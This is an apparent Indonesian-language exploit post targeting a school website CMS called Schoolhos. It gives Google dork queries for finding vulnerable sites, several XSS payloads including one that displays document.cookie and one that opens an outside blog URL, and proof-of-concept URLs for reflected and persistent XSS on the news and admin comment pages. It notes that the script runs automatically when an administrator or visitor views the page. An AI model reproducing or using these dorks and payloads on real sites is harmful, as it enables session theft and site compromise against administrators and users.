Google Dork:
inurl:/?p=bukutamu
intext:Schoolhos Free Open Source CMS
CONTOH XSS :
<script>alert('barrabravaz');</script>
<script>alert(document.cookie);</script>
<script>window.open("http://www.angonkimcil.blogspot.com/")</script>
POC :
http://www.contoh.com/index.php?p=detberita&id=XSS
- Presistent XSS :
POC :
http://www.contoh.com/adminpanel/komentar.php <--- Apabila Si Admin melihat/masuk di halaman ini, script akan otomatis ter eksekusi.
http://www.contoh.com/index.php?p=detberita&id=XSS <--- Jika user / urang yang sedang browsing di halaman yang anda kenai XSS, otomatis script XSS anda ter eksekusi :D